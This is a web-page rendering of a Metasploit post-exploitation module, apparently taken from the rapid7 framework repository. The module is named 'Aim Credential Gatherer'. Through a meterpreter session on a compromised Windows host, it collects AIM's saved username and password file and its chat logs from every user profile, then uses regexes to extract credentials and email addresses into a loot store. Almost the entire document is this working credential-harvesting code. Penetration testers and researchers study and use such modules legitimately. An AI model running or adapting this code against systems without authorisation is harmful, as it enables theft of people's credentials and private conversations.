Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/aim.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::File
8
include Msf::Post::Windows::UserProfiles
9
include Msf::Post::Windows::Packrat
10
ARTIFACTS =
11
{
12
application: 'AIM',
13
app_category: 'chats',
14
gatherable_artifacts: [
15
{
16
filetypes: 'logins',
17
path: 'LocalAppData',
18
dir: 'AIM',
19
artifact_file_name: 'aimx.bin',
20
description: "AIM's saved Username and Passwords",
21
credential_type: 'text',
22
regex_search: [
23
{
24
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
25
extraction_type: 'credentials',
26
regex: [
27
'(?i-mx:password.*)',
28
'(?i-mx:username.*)'
29
]
30
},
31
{
32
extraction_description: 'searches for Email TO/FROM address',
33
extraction_type: 'Email addresses',
34
regex: [
35
'(?i-mx:to:.*)',
36
'(?i-mx:from:.*)'
37
]
38
}
39
]
40
},
41
{
42
filetypes: 'chat_logs',
43
path: 'LocalAppData',
44
dir: 'AIM',
45
artifact_file_name: '*.html',
46
description: "AIM's chat logs with date and times",
47
credential_type: 'text',
48
regex_search: [
49
{
50
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
51
extraction_type: 'credentials',
52
regex: [
53
'(?i-mx:password.*)',
54
'(?i-mx:username.*)'
55
]
56
},
57
{
58
extraction_description: 'searches for Email TO/FROM address',
59
extraction_type: 'Email addresses',
60
regex: [
61
'(?i-mx:to:.*)',
62
'(?i-mx:from:.*)'
63
]
64
}
65
]
66
}
67
]
68
}.freeze
69
70
def initialize(info = {})
71
super(
72
update_info(
73
info,
74
'Name' => 'Aim Credential Gatherer',
75
'Description' => %q{
76
This module searches for Aim credentials on a Windows host.
77
},
78
'License' => MSF_LICENSE,
79
'Author' => [
80
'Kazuyoshi Maruta',
81
'Daniel Hallsworth',
82
'Barwar Salim M',
83
'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
84
],
85
'Platform' => ['win'],
86
'SessionTypes' => ['meterpreter'],
87
'Notes' => {
88
'Stability' => [CRASH_SAFE],
89
'Reliability' => [],
90
'SideEffects' => []
91
}
92
)
93
)
94
95
register_options(
96
[
97
OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
98
OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
99
OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
100
# enumerates the options based on the artifacts that are defined below
101
OptEnum.new('ARTIFACTS', [
102
false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
103
k[:filetypes]
104
end.uniq.unshift('All')
105
])
106
]
107
)
108
end
109
110
def run
111
print_status('Filtering based on these selections: ')
112
print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
113
print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
114
print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
115
116
# used to grab files for each user on the remote host
117
grab_user_profiles.each do |userprofile|
118
run_packrat(userprofile, ARTIFACTS)
119
end
120
121
print_status 'PackRat credential sweep completed'
122
end
123
end
124
125